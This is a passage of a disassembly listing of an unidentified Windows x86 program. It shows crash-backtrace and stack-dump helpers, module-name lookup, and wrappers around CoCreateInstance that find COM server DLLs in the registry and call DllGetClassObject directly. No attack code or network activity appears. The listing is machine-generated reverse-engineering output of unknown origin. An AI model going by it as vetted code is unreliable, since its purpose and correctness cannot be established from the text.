loc_41C580: ; CODE XREF: sub_41C317+263�j
push 1
pop eax
locret_41C583: ; CODE XREF: sub_41C317+267�j
leave
retn 4
sub_41C317 endp
; ---------------------------------------------------------------------------
off_41C587 dd offset loc_41C47E ; DATA XREF: sub_41C317+160�r
dd offset loc_41C48A
dd offset loc_41C496
dd offset loc_41C4AE
dd offset loc_41C4BA
dd offset loc_41C4C6
dd offset loc_41C4D2
dd offset loc_41C4DB
dd offset loc_41C4E4
dd offset loc_41C4ED
dd offset loc_41C4F6
dd offset loc_41C4FF
dd offset loc_41C4A2
dd offset loc_41C508
dd offset loc_41C511
dd offset loc_41C52C
dd offset loc_41C51A
dd offset loc_41C535
dd offset loc_41C53E
dd offset loc_41C547
dd offset loc_41C523
dd offset loc_41C557
dd offset loc_41C550
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C5E3 proc near ; CODE XREF: sub_41C87E+40�p
; sub_41C87E+83�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421548
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, offset dword_4289F0
test eax, eax
jnz short loc_41C61E
mov eax, offset aBroken ; "!broken!"
jmp loc_41C6F6
; ---------------------------------------------------------------------------
loc_41C61E: ; CODE XREF: sub_41C5E3+2F�j
mov ecx, 100h
xor eax, eax
mov edi, offset dword_4289F0
rep stosd
and [ebp+var_4], 0
push 1Ch
lea eax, [ebp+var_40]
push eax
push [ebp+arg_0]
call ds:dword_424730 ; VirtualQuery
test eax, eax
jnz short loc_41C668
push offset a0x08xUnknownUn ; "0x%08x:[unknown]:unknown"
push offset dword_4289F0
call ds:dword_424754 ; wsprintfA
pop ecx
pop ecx
mov [ebp+var_44], offset dword_4289F0
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_44]
jmp loc_41C6F6
; ---------------------------------------------------------------------------
loc_41C668: ; CODE XREF: sub_41C5E3+5E�j
lea eax, [ebp+var_40]
push eax
call sub_41C7DF
pop ecx
mov [ebp+var_20], eax
and [ebp+var_24], 0
and [ebp+var_1C], 0
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_40]
push eax
push [ebp+arg_0]
call sub_41C705
add esp, 10h
cmp [ebp+var_20], 0
jnz short loc_41C6A1
mov [ebp+var_20], offset aUnknown ; "unknown"
loc_41C6A1: ; CODE XREF: sub_41C5E3+B5�j
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+var_20]
push [ebp+arg_0]
push offset a0x08xS03x08x ; "0x%08x:[%s]:(%03x:%08x)"
push offset dword_4289F0
call ds:dword_424754 ; wsprintfA
add esp, 18h
mov [ebp+var_48], offset dword_4289F0
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_48]
jmp short loc_41C6F6
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
push [ebp+arg_0]
push offset aBroken0x08x ; "!broken!0x%08x:"
push offset dword_4289F0
call ds:dword_424754 ; wsprintfA
add esp, 0Ch
mov eax, offset dword_4289F0
loc_41C6F6: ; CODE XREF: sub_41C5E3+36�j
; sub_41C5E3+80�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41C5E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C705 proc near ; CODE XREF: sub_41C5E3+A9�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
mov eax, [ebp+arg_4]
mov eax, [eax+4]
mov ecx, [ebp+arg_4]
mov ecx, [ecx+4]
add ecx, [eax+3Ch]
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+18h]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
sub ecx, [eax+4]
mov [ebp+var_C], ecx
and [ebp+var_4], 0
jmp short loc_41C748
; ---------------------------------------------------------------------------
loc_41C741: ; CODE XREF: sub_41C705:loc_41C7D5�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_41C748: ; CODE XREF: sub_41C705+3A�j
mov eax, [ebp+var_10]
movzx eax, word ptr [eax+6]
cmp [ebp+var_4], eax
jnb loc_41C7DA
mov eax, [ebp+var_4]
imul eax, 28h
mov ecx, [ebp+var_8]
mov eax, [ecx+eax+0Ch]
mov [ebp+var_18], eax
mov eax, [ebp+var_4]
imul eax, 28h
mov ecx, [ebp+var_4]
imul ecx, 28h
mov edx, [ebp+var_8]
mov esi, [ebp+var_8]
mov eax, [edx+eax+10h]
cmp eax, [esi+ecx+8]
jbe short loc_41C796
mov eax, [ebp+var_4]
imul eax, 28h
mov ecx, [ebp+var_8]
mov eax, [ecx+eax+10h]
mov [ebp+var_1C], eax
jmp short loc_41C7A6
; ---------------------------------------------------------------------------
loc_41C796: ; CODE XREF: sub_41C705+7D�j
mov eax, [ebp+var_4]
imul eax, 28h
mov ecx, [ebp+var_8]
mov eax, [ecx+eax+8]
mov [ebp+var_1C], eax
loc_41C7A6: ; CODE XREF: sub_41C705+8F�j
mov eax, [ebp+var_18]
add eax, [ebp+var_1C]
mov [ebp+var_14], eax
mov eax, [ebp+var_C]
cmp eax, [ebp+var_18]
jb short loc_41C7D5
mov eax, [ebp+var_C]
cmp eax, [ebp+var_14]
jnb short loc_41C7D5
mov eax, [ebp+var_4]
inc eax
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+var_C]
sub eax, [ebp+var_18]
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp short loc_41C7DA
; ---------------------------------------------------------------------------
loc_41C7D5: ; CODE XREF: sub_41C705+B0�j
; sub_41C705+B8�j
jmp loc_41C741
; ---------------------------------------------------------------------------
loc_41C7DA: ; CODE XREF: sub_41C705+4D�j
; sub_41C705+CE�j
xor al, al
pop esi
leave
retn
sub_41C705 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C7DF proc near ; CODE XREF: sub_41C5E3+89�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push edi
push 41h
pop ecx
xor eax, eax
mov edi, offset dword_428DF0
rep stosd
push 104h
push offset dword_428DF0
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
call ds:dword_424694 ; GetModuleFileNameA
test eax, eax
jnz short loc_41C80F
xor eax, eax
jmp short loc_41C87B
; ---------------------------------------------------------------------------
loc_41C80F: ; CODE XREF: sub_41C7DF+2A�j
push 5Ch
push offset dword_428DF0
call sub_4105C0
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41C82C
mov eax, [ebp+var_4]
inc eax
jmp short loc_41C87B
; ---------------------------------------------------------------------------
loc_41C82C: ; CODE XREF: sub_41C7DF+45�j
mov edi, offset dword_428DF0
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push 50h
pop eax
cmp eax, ecx
sbb eax, eax
neg eax
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41C876
mov eax, [ebp+var_8]
mov ds:byte_428DA0[eax], 2Eh
mov eax, [ebp+var_8]
mov ds:byte_428DA1[eax], 2Eh
mov eax, [ebp+var_8]
mov ds:byte_428DA2[eax], 2Eh
mov eax, [ebp+var_8]
lea eax, byte_428DA0[eax]
jmp short loc_41C87B
; ---------------------------------------------------------------------------
loc_41C876: ; CODE XREF: sub_41C7DF+6C�j
mov eax, offset dword_428DF0
loc_41C87B: ; CODE XREF: sub_41C7DF+2E�j
; sub_41C7DF+4B�j ...
pop edi
leave
retn
sub_41C7DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C87E proc near ; CODE XREF: sub_41C317+132�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421558
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
push offset aBacktrace ; "-- backtrace --"
call sub_41BE16
pop ecx
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
and [ebp+var_4], 0
push [ebp+arg_0]
call sub_41C5E3
pop ecx
push eax
push offset aS ; " %s"
call sub_41BE16
pop ecx
pop ecx
and [ebp+var_20], 0
jmp short loc_41C8E6
; ---------------------------------------------------------------------------
loc_41C8D7: ; CODE XREF: sub_41C87E+96�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
mov eax, [ebp+var_1C]
mov eax, [eax]
mov [ebp+var_1C], eax
loc_41C8E6: ; CODE XREF: sub_41C87E+57�j
cmp [ebp+var_20], 40h
jnb short loc_41C916
cmp [ebp+var_1C], 0
jz short loc_41C916
mov eax, [ebp+var_1C]
cmp dword ptr [eax+4], 0
jz short loc_41C916
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
call sub_41C5E3
pop ecx
push eax
push offset aS ; " %s"
call sub_41BE16
pop ecx
pop ecx
jmp short loc_41C8D7
; ---------------------------------------------------------------------------
loc_41C916: ; CODE XREF: sub_41C87E+6C�j
; sub_41C87E+72�j ...
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41C932
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
push offset a___OpssBrokenB ; " ... opss, broken by SEH"
call sub_41BE16
pop ecx
or [ebp+var_4], 0FFFFFFFFh
loc_41C932: ; CODE XREF: sub_41C87E+9C�j
push offset aStack ; "--stack--"
call sub_41BE16
pop ecx
mov eax, [ebp+arg_8]
mov [ebp+var_1C], eax
mov [ebp+var_4], 1
and [ebp+var_24], 0
jmp short loc_41C957
; ---------------------------------------------------------------------------
loc_41C950: ; CODE XREF: sub_41C87E+10F�j
mov eax, [ebp+var_24]
inc eax
mov [ebp+var_24], eax
loc_41C957: ; CODE XREF: sub_41C87E+D0�j
cmp [ebp+var_24], 8
jnb short loc_41C98F
mov eax, [ebp+var_1C]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_1C]
push dword ptr [eax+8]
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
mov eax, [ebp+var_1C]
push dword ptr [eax]
push [ebp+var_1C]
push offset a0x08x0x08x0x08 ; "0x%08x: 0x%08x 0x%08x 0x%08x 0x%08x"
call sub_41BE16
add esp, 18h
mov eax, [ebp+var_1C]
add eax, 10h
mov [ebp+var_1C], eax
jmp short loc_41C950
; ---------------------------------------------------------------------------
loc_41C98F: ; CODE XREF: sub_41C87E+DD�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41C9AB
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
push offset a___OpssBrokenB ; " ... opss, broken by SEH"
call sub_41BE16
pop ecx
or [ebp+var_4], 0FFFFFFFFh
loc_41C9AB: ; CODE XREF: sub_41C87E+115�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41C87E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C9BA proc near ; CODE XREF: sub_41365E+64�p
; sub_41553D+249�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
and [ebp+var_8], 0
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+1]
push eax
call sub_41BA4A
pop ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_8], eax
mov ecx, [ebp+var_4]
inc ecx
mov esi, [ebp+arg_0]
mov edi, [ebp+var_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_8]
pop edi
pop esi
leave
retn
sub_41C9BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CA0F proc near ; CODE XREF: sub_41CAA3+1F�p
; sub_41CF9E+40�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
and eax, 1
test eax, eax
jnz short loc_41CA26
mov eax, 80004005h
jmp short locret_41CAA1
; ---------------------------------------------------------------------------
loc_41CA26: ; CODE XREF: sub_41CA0F+E�j
push [ebp+arg_0]
call sub_416BE0
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41CA9C
push 8
pop edx
mov ecx, [ebp+var_4]
call sub_419995
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_41CA5C
mov eax, [ebp+arg_14]
mov dword ptr [eax], 80004005h
mov eax, 80004005h
jmp short locret_41CAA1
; ---------------------------------------------------------------------------
loc_41CA5C: ; CODE XREF: sub_41CA0F+3B�j
and [ebp+var_C], 0
push offset aDllgetclassobj ; "DllGetClassObject"
push [ebp+var_8]
call ds:dword_4246A8 ; GetProcAddress
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_41CA87
mov eax, [ebp+arg_14]
mov dword ptr [eax], 80004005h
mov eax, 80004005h
jmp short locret_41CAA1
; ---------------------------------------------------------------------------
loc_41CA87: ; CODE XREF: sub_41CA0F+66�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call [ebp+var_C]
mov ecx, [ebp+arg_14]
mov [ecx], eax
xor eax, eax
jmp short locret_41CAA1
; ---------------------------------------------------------------------------
loc_41CA9C: ; CODE XREF: sub_41CA0F+27�j
mov eax, 80004005h
locret_41CAA1: ; CODE XREF: sub_41CA0F+15�j
; sub_41CA0F+4B�j ...
leave
retn
sub_41CA0F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CAA3 proc near ; CODE XREF: sub_41CBF6+53�p
; sub_41CE67+43�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 1Ch
and [ebp+var_4], 0
push [ebp+arg_18]
lea eax, [ebp+var_4]
push eax
push offset dword_4241A8
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_41CA0F
add esp, 18h
test eax, eax
jl loc_41CBEF
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_14], 0
and [ebp+var_8], 0
lea eax, [ebp+var_8]
push eax
push offset dword_424198
push [ebp+arg_4]
mov eax, [ebp+var_4]
mov eax, [eax]
push [ebp+var_4]
call dword ptr [eax+0Ch]
test eax, eax
jl loc_41CB99
and [ebp+var_18], 0
jmp short loc_41CB0E
; ---------------------------------------------------------------------------
loc_41CB07: ; CODE XREF: sub_41CAA3+E6�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_41CB0E: ; CODE XREF: sub_41CAA3+62�j
mov eax, [ebp+var_18]
cmp eax, [ebp+arg_10]
jnb short loc_41CB8E
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
lea eax, [ecx+eax+4]
push eax
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
push dword ptr [ecx+eax]
mov eax, [ebp+var_8]
mov eax, [eax]
push [ebp+var_8]
call dword ptr [eax]
mov ecx, [ebp+var_18]
imul ecx, 0Ch
mov edx, [ebp+arg_14]
mov [edx+ecx+8], eax
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
cmp dword ptr [ecx+eax+8], 0
jl short loc_41CB5D
mov [ebp+var_C], 1
jmp short loc_41CB7A
; ---------------------------------------------------------------------------
loc_41CB5D: ; CODE XREF: sub_41CAA3+B2�j
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
cmp dword ptr [ecx+eax+8], 80004002h
jnz short loc_41CB76
mov [ebp+var_10], 1
jmp short loc_41CB7A
; ---------------------------------------------------------------------------
loc_41CB76: ; CODE XREF: sub_41CAA3+CB�j
mov [ebp+var_14], 1
loc_41CB7A: ; CODE XREF: sub_41CAA3+B8�j
; sub_41CAA3+D1�j
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
mov eax, [ecx+eax]
mov [ebp+var_1C], eax
jmp loc_41CB07
; ---------------------------------------------------------------------------
loc_41CB8E: ; CODE XREF: sub_41CAA3+71�j
mov eax, [ebp+var_8]
mov eax, [eax]
push [ebp+var_8]
call dword ptr [eax+8]
loc_41CB99: ; CODE XREF: sub_41CAA3+58�j
movzx eax, [ebp+var_14]
test eax, eax
jz short loc_41CBAC
mov eax, [ebp+arg_18]
mov dword ptr [eax], 80004005h
jmp short loc_41CBE0
; ---------------------------------------------------------------------------
loc_41CBAC: ; CODE XREF: sub_41CAA3+FC�j
movzx eax, [ebp+var_C]
test eax, eax
jz short loc_41CBC7
movzx eax, [ebp+var_10]
test eax, eax
jz short loc_41CBC7
mov eax, [ebp+arg_18]
mov dword ptr [eax], 80012h
jmp short loc_41CBE0
; ---------------------------------------------------------------------------
loc_41CBC7: ; CODE XREF: sub_41CAA3+10F�j
; sub_41CAA3+117�j
movzx eax, [ebp+var_C]
test eax, eax
jz short loc_41CBD7
mov eax, [ebp+arg_18]
and dword ptr [eax], 0
jmp short loc_41CBE0
; ---------------------------------------------------------------------------
loc_41CBD7: ; CODE XREF: sub_41CAA3+12A�j
mov eax, [ebp+arg_18]
mov dword ptr [eax], 80004002h
loc_41CBE0: ; CODE XREF: sub_41CAA3+107�j
; sub_41CAA3+122�j ...
mov eax, [ebp+var_4]
mov eax, [eax]
push [ebp+var_4]
call dword ptr [eax+8]
xor eax, eax
jmp short locret_41CBF4
; ---------------------------------------------------------------------------
loc_41CBEF: ; CODE XREF: sub_41CAA3+29�j
mov eax, 80004005h
locret_41CBF4: ; CODE XREF: sub_41CAA3+14A�j
leave
retn
sub_41CAA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CBF6 proc near ; DATA XREF: _5:off_424390�o
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421570
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
and [ebp+var_2C], 0
xor eax, eax
lea edi, [ebp+var_28]
stosd
stosd
mov eax, [ebp+arg_C]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_2C]
push eax
push 1
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CAA3
add esp, 1Ch
test eax, eax
jl short loc_41CC78
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_28]
mov [eax], ecx
push 0FFFFFFFFh
mov eax, [ebp+var_24]
mov [ebp+var_38], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp loc_41CD05
; ---------------------------------------------------------------------------
loc_41CC78: ; CODE XREF: sub_41CBF6+5D�j
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_41CCB4
push [ebp+arg_0]
call sub_41CD16
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_41CCB4
mov [ebp+arg_8], 1
push [ebp+var_1C]
call ds:dword_424698 ; GetModuleHandleA
test eax, eax
jnz short loc_41CCB4
push 8
push 0
push [ebp+var_1C]
call sub_41E170
loc_41CCB4: ; CODE XREF: sub_41CBF6+8A�j
; sub_41CBF6+9C�j ...
and [ebp+var_20], 0
push offset dword_4215D4
push offset aCocreateinstan ; "CoCreateInstance"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_20], eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_20]
push 0FFFFFFFFh
mov [ebp+var_3C], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_41CD05
; ---------------------------------------------------------------------------
loc_41CCF3: ; DATA XREF: _4:00421578�o
mov eax, [ebp+var_1C]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_41BACD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_41CD05: ; CODE XREF: sub_41CBF6+7D�j
; sub_41CBF6+FB�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 14h
sub_41CBF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CD16 proc near ; CODE XREF: sub_41CBF6+8F�p
; sub_41CE67+8F�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041CD80 SIZE 0000007A BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421580
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
push offset dword_428FF8
call ds:dword_424644 ; RtlEnterCriticalSection
and [ebp+var_4], 0
cmp ds:dword_429010, 0
jnz short loc_41CD69
push offset aAdvapi32_dll ; "ADVAPI32.DLL"
push offset aRegqueryvaluea ; "RegQueryValueA"
call sub_41D300
pop ecx
pop ecx
mov ds:dword_429010, eax
loc_41CD69: ; CODE XREF: sub_41CD16+3B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_41CD74
jmp short loc_41CD80
sub_41CD16 endp
; =============== S U B R O U T I N E =======================================
sub_41CD74 proc near ; CODE XREF: sub_41CD16+57�p
; DATA XREF: _4:00421588�o
push offset dword_428FF8
call ds:dword_4246D4 ; RtlLeaveCriticalSection
retn
sub_41CD74 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41CD16
loc_41CD80: ; CODE XREF: sub_41CD16+5C�j
push 401h
call sub_41BA4A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_1C], eax
mov [ebp+var_20], 400h
mov ecx, [ebp+var_20]
xor eax, eax
mov edi, [ebp+var_1C]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push [ebp+arg_0]
call sub_41CDFA
pop ecx
lea eax, [ebp+var_20]
push eax
push [ebp+var_1C]
push offset dword_428EF8
push 80000000h
call ds:dword_429010
test eax, eax
jnz short loc_41CDDA
mov eax, [ebp+var_1C]
jmp short loc_41CDEB
; ---------------------------------------------------------------------------
loc_41CDDA: ; CODE XREF: sub_41CD16+BD�j
mov eax, [ebp+var_1C]
mov [ebp+var_28], eax
push [ebp+var_28]
call sub_41BACD
pop ecx
xor eax, eax
loc_41CDEB: ; CODE XREF: sub_41CD16+C2�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_41CD16
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CDFA proc near ; CODE XREF: sub_41CD16+9E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Fh]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Eh]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Dh]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Ch]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Bh]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Ah]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+9]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+8]
push eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax+6]
push eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax+4]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
push offset aClsid08x04x04x ; "CLSID\\{%08x-%04x-%04x-%02x%02x-%02x%02x"...
push offset dword_428EF8
call ds:dword_424754 ; wsprintfA
add esp, 34h
pop ebp
retn
sub_41CDFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CE67 proc near ; DATA XREF: _5:00424398�o
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421590
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
lea eax, [ebp+var_2C]
push eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CAA3
add esp, 1Ch
test eax, eax
jl short loc_41CED1
push 0FFFFFFFFh
mov eax, [ebp+var_2C]
mov [ebp+var_38], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp loc_41CF8D
; ---------------------------------------------------------------------------
loc_41CED1: ; CODE XREF: sub_41CE67+4D�j
and [ebp+var_20], 0
push offset dword_4215D4
push offset aCocreateinst_0 ; "CoCreateInstanceEx"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_41CF25
push [ebp+arg_0]
call sub_41CD16
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_41CF25
mov [ebp+arg_8], 1
push [ebp+var_1C]
call ds:dword_424698 ; GetModuleHandleA
test eax, eax
jnz short loc_41CF25
push 8
push 0
push [ebp+var_1C]
call sub_41E170
loc_41CF25: ; CODE XREF: sub_41CE67+8A�j
; sub_41CE67+9C�j ...
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_20]
mov [ebp+var_24], eax
and [ebp+var_28], 0
jmp short loc_41CF4A
; ---------------------------------------------------------------------------
loc_41CF43: ; CODE XREF: sub_41CE67+FA�j
mov eax, [ebp+var_28]
inc eax
mov [ebp+var_28], eax
loc_41CF4A: ; CODE XREF: sub_41CE67+DA�j
mov eax, [ebp+var_28]
cmp eax, [ebp+arg_10]
jnb short loc_41CF63
mov eax, [ebp+var_28]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
mov eax, [ecx+eax]
mov [ebp+var_30], eax
jmp short loc_41CF43
; ---------------------------------------------------------------------------
loc_41CF63: ; CODE XREF: sub_41CE67+E9�j
push 0FFFFFFFFh
mov eax, [ebp+var_24]
mov [ebp+var_3C], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
